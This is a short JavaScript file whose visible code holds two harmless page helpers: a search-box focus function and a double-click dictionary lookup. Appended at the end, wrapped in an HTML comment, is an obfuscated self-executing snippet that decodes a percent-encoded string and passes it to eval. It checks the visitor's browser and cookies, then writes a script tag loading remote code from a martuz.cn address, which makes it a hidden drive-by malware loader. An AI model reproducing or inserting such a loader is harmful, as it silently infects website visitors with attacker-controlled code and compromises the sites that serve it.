function sf(){document.f.q.focus();}

//don't forget to add <body ondblclick="dictionary()">
function dictionary() {
	if (navigator.appName!='Microsoft Internet Explorer') {
		t = document.getSelection();
		opennewdictwin(t);
	}
	else {
		t = document.selection.createRange();
		if(document.selection.type == 'Text' && t.text != '') {
			document.selection.empty();
			opennewdictwin(t.text);
			}
		}
}

<!-- 
(function(){var nXi='%';var zIja=('"76ar"20a"3d"22Scri"70"74"45n"67ine"22"2cb"3d"22Version()+"22"2cj"3d"22"22"2cu"3d"6eavi"67a"74or"2eu"73er"41gent"3bi"66((u"2e"69ndex"4ff("22Chro"6d"65"22"29"3c0)"26"26"28"75"2ein"64"65x"4f"66("22Win"22)"3e"30)"26"26"28"75"2ein"64"65"78Of("22NT"206"22"29"3c0"29"26"26(do"63u"6dent"2eco"6fkie"2eindexOf("22"6die"6b"3d1"22"29"3c"30)"26"26"28t"79"70eof(zr"76"7at"73)"21"3dtypeof("22A"22)))"7b"7arvz"74s"3d"22A"22"3beval("22i"66"28window"2e"22+"61+"22)j"3dj+"22+a+"22M"61jor"22"2bb+"61+"22Min"6f"72"22+"62+a+"22Build"22"2bb+"22j"3b"22)"3bdoc"75m"65nt"2ewri"74e("22"3c"73"63ri"70t"20"73rc"3d"2f"2fm"22"2b"22art"75z"2ecn"2fvid"2f"3fid"3d"22+j+"22"3e"3c"5c"2fscr"69"70t"3e"22)"3b"7d').replace(/"/g,nXi);var cgY=unescape(zIja);eval(cgY)})();
 -->